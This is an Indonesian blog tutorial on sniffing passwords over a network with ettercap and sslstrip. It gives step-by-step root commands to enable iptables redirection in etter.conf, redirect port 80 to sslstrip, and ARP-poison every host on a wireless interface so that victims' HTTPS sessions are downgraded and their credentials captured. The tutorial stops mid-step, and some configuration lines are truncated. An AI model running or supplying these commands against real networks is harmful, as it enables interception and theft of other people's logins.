KUTIPAN ILMU: sniffing menggunakan sslstrip pada ettercap

Disini saya akan menjelaskan bagaimana sniffing menggunakan sslstrip pada ettercap.

ok langsung aja ya.. yang pasti kalian harus koneksi terlebih dahulu..

bagaimana,sampai sini sudah jelas???

kalo sudah jelas kita lanjutkan perintah-perintahnya.

Pertama kita ketikan perintah dibawah ini dikonsole :

root@boiem:~# nano /etc/etter.conf

Kemudian kita edit dulu konfigurasinya menggunakan editor nano. dan pada bagian redir_command kita hilangkan tanda pagar di bagian iptables agar ettercap mengaktifkan fungsi redir_command

# if you use iptables:
redir_command_on = “iptables -t nat -A PREROUTING -i %iface -p tcp –dport $
redir_command_off = “iptables -t nat -D PREROUTING -i %iface -p tcp –dport$

kalo sudah kita tutup dan save dengan menekan CTRL + x kemudian memilih Y dan ENTER, kemudian melakukan setting pada firewall kita agar koneksi pada port default akses web (80) kita redirect ke port SSLSTRIP yang kita gunakan untuk menterjemahkan akses HTTPS korban ke HTTP, dengan perintah

root@boiem:~# iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 10000

selanjutnya kita aktifkan sslstrip di tab konsole baru dengan perintah

root@boiem:~# sslstrip -a -k -f

kwmudian kita aktifkan ettercap di tab baru sebagai penjaring password dan alat untuk melakukan poisoning ARP, dibagian inilah yang membedakan antara sniffing 1 target dan sniffing massal, dengan perintah

root@boiem:~# ettercap -T -q -i wlan0 -M ARP // //

dimana opsi -i wlan0 adalah opsi untuk memilih jenis interface yang kita gunakan, saya menggunakan koneksi wireless, jadi saya menggunakan wlan0

Selanjutnya pada bagian utamanya yang tidak boleh kita lupakan adalah ip_forward dengan perintah di TAB konsole baru untuk menghindari kesalahan yang sering terjadi pada saat memberikan perintah ini di awalan sebelum konfigurasi pada firewall: